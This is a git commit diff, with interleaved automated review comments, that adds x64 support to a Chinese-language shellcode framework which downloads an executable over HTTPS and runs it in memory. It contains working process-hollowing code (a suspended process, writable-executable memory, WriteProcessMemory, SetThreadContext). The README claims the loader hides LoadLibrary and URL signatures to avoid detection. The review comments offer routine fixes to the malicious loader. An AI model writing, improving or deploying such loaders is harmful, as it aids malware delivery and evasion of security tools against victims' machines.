添加x64支持
This commit is contained in:
parent
f2a79f5e05
commit
12a917c5db
Binary file not shown.
|
@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
|
|
||||||
int _tmain(int argc, _TCHAR* argv[])
|
int _tmain(int argc, _TCHAR* argv[])
|
||||||
{
|
{
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -159,6 +159,11 @@
|
||||||
<AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
|
<AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="api.h" />
|
<ClInclude Include="api.h" />
|
||||||
<ClInclude Include="hash.h" />
|
<ClInclude Include="hash.h" />
|
||||||
|
|
|
@ -1,10 +1,15 @@
|
||||||
#include "ShellCode.h"
|
#include "ShellCode.h"
|
||||||
|
|
||||||
//加载起始函数,跳转到入口函数
|
//加载起始函数,跳转到入口函数
|
||||||
|
#ifdef _WIN64
|
||||||
|
VOID mmLoaderSCStart(){
|
||||||
|
Strat();
|
||||||
|
#else
|
||||||
VOID _declspec(naked) mmLoaderSCStart()
|
VOID _declspec(naked) mmLoaderSCStart()
|
||||||
{
|
{
|
||||||
|
|
||||||
__asm jmp Strat;
|
__asm jmp Strat;
|
||||||
|
#endif
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
@ -49,7 +54,7 @@ public:
|
||||||
|
|
||||||
|
|
||||||
//提取项目的main文件,StartSCode相当于项目的main函数
|
//提取项目的main文件,StartSCode相当于项目的main函数
|
||||||
void __stdcall StartSCode(char * URL)
|
void __stdcall StartSCode()
|
||||||
{
|
{
|
||||||
|
|
||||||
|
|
||||||
|
@ -62,7 +67,7 @@ public:
|
||||||
|
|
||||||
int size = HttpDownload(host, path, 443, TRUE);
|
int size = HttpDownload(host, path, 443, TRUE);
|
||||||
|
|
||||||
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||||
|
|
||||||
RunPortableExecutable();
|
RunPortableExecutable();
|
||||||
|
|
||||||
|
@ -75,15 +80,21 @@ public:
|
||||||
};
|
};
|
||||||
|
|
||||||
//sehllcode入口函数
|
//sehllcode入口函数
|
||||||
void __stdcall Strat(char * URL)
|
void __stdcall Strat()
|
||||||
{
|
{
|
||||||
//由于需要模拟全局变量,所以使用类包裹下
|
//由于需要模拟全局变量,所以使用类包裹下
|
||||||
RmExecute runclass;
|
RmExecute runclass;
|
||||||
|
|
||||||
runclass.StartSCode(URL);
|
runclass.StartSCode();
|
||||||
}
|
}
|
||||||
|
#ifdef _WIN64
|
||||||
|
void mmLoaderSCEnd()
|
||||||
|
{
|
||||||
|
|
||||||
|
#else
|
||||||
void __declspec(naked) mmLoaderSCEnd()
|
void __declspec(naked) mmLoaderSCEnd()
|
||||||
{
|
{
|
||||||
|
|
||||||
__asm int 3;
|
__asm int 3;
|
||||||
|
#endif
|
||||||
}
|
}
|
|
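Review bot: `StartSCode()` and `Strat()` drop their `char * URL` parameter (hunks @-49 and @-75 here, and the matching declaration in the header hunk @-9), but the comments above both definitions are unchanged and nothing in these hunks says where the `host` and `path` passed to `HttpDownload(host, path, 443, TRUE)` now come from; add a one-line comment above the `StartSCode` definition stating where they are initialised now that the caller no longer supplies a URL. The body of `StartSCode` continues outside the hunk, so check it before wording that comment. Separately, in hunk @-62 the `fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);` debugging call is kept as commented-out code; delete it (history is in version control) or guard it with `#ifdef _DEBUG` instead of leaving a comment.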
@ -9,7 +9,7 @@
|
||||||
EXTERN_C VOID
|
EXTERN_C VOID
|
||||||
mmLoaderSCStart();//这里用来表明shellcode的开始
|
mmLoaderSCStart();//这里用来表明shellcode的开始
|
||||||
|
|
||||||
void __stdcall Strat(char * URL);//入口函数main
|
void __stdcall Strat();//入口函数main
|
||||||
|
|
||||||
EXTERN_C VOID
|
EXTERN_C VOID
|
||||||
mmLoaderSCEnd();//与开头对应的结尾
|
mmLoaderSCEnd();//与开头对应的结尾
|
|
@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
|
||||||
return dwLast;
|
return dwLast;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _WIN64
|
||||||
|
bool RmExecute::RunPortableExecutable() {
|
||||||
|
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
|
||||||
|
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
|
||||||
|
IMAGE_SECTION_HEADER* SectionHeader;
|
||||||
|
|
||||||
|
PROCESS_INFORMATION PI;
|
||||||
|
STARTUPINFOA SI;
|
||||||
|
|
||||||
|
CONTEXT* CTX;
|
||||||
|
|
||||||
|
ULONG_PTR* ImageBase; //Base address of the image
|
||||||
|
void* pImageBase; // Pointer to the image base
|
||||||
|
|
||||||
|
int count;
|
||||||
|
char CurrentFilePath[1024];
|
||||||
|
|
||||||
|
DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
|
||||||
|
NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
|
||||||
|
|
||||||
|
GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
|
||||||
|
|
||||||
|
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
|
||||||
|
{
|
||||||
|
ZeroMemory(&PI, sizeof(PI)); // Null the memory
|
||||||
|
ZeroMemory(&SI, sizeof(SI)); // Null the memory
|
||||||
|
|
||||||
|
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
|
||||||
|
CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
|
||||||
|
//process in suspended state, for the new image.
|
||||||
|
{
|
||||||
|
// Allocate memory for the context.
|
||||||
|
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
|
||||||
|
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
|
||||||
|
|
||||||
|
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
|
||||||
|
{
|
||||||
|
// Read instructions
|
||||||
|
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
|
||||||
|
|
||||||
|
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
|
||||||
|
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||||
|
|
||||||
|
// Write the image to the process
|
||||||
|
WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
|
||||||
|
|
||||||
|
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
|
||||||
|
{
|
||||||
|
SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
|
||||||
|
|
||||||
|
WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
|
||||||
|
LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
|
||||||
|
}
|
||||||
|
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
|
||||||
|
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
|
||||||
|
|
||||||
|
// Move address of entry point to the rax register
|
||||||
|
CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
|
||||||
|
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
|
||||||
|
ResumeThread(PI.hThread);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
#else
|
||||||
bool RmExecute::RunPortableExecutable()
|
bool RmExecute::RunPortableExecutable()
|
||||||
{
|
{
|
||||||
|
|
||||||
|
@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
|
||||||
}
|
}
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
#endif
|
|
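Review bot: The new x64 `RmExecute::RunPortableExecutable()` in hunk @-311 only returns on the innermost success path (`return 0;`); when the `IMAGE_NT_SIGNATURE` check, `CreateProcessA` or `GetThreadContext` fails, control falls off the end of a `bool` function, which is undefined behaviour, whereas the 32-bit variant in hunk @-379 ends with `return false;`. Add `return false;` before the function's closing brace so every path has a defined result. On the success path `return 0;` in a function declared `bool` reads as `false`; if callers test the return value, `return true;` (or whatever the 32-bit variant returns on success, which is outside the hunk) would be the consistent choice. Nothing in this variant releases the `PROCESS_INFORMATION` handles or the `VirtualAlloc`'d `CTX` on any path, so a `CloseHandle`/`VirtualFree` cleanup before each return would also be expected.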
@ -2,7 +2,7 @@
|
||||||
|
|
||||||
Remote Download and Memory Execute for shellcode framework
|
Remote Download and Memory Execute for shellcode framework
|
||||||
|
|
||||||
远程下载并内存加载的ShellCode框架,暂不支持X64
|
远程下载并内存加载的ShellCode框架,已经支持x64
|
||||||
|
|
||||||
# 参(抄)考(袭)项目
|
# 参(抄)考(袭)项目
|
||||||
|
|
||||||
|
@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
|
||||||
|
|
||||||
隐藏loadlibrary特征和url特征,更不容易被发现
|
隐藏loadlibrary特征和url特征,更不容易被发现
|
||||||
|
|
||||||
## X64支持
|
|
||||||
|
|
||||||
自行调试`Tool.h->RunPortableExecutable`函数,大概就是加个X64宏把EAX什么换成RAX(应该
|
|
||||||
|
|
||||||
## 反射DLL加载技术
|
## 反射DLL加载技术
|
||||||
|
|
||||||
完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化
|
完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化
|
||||||
|
|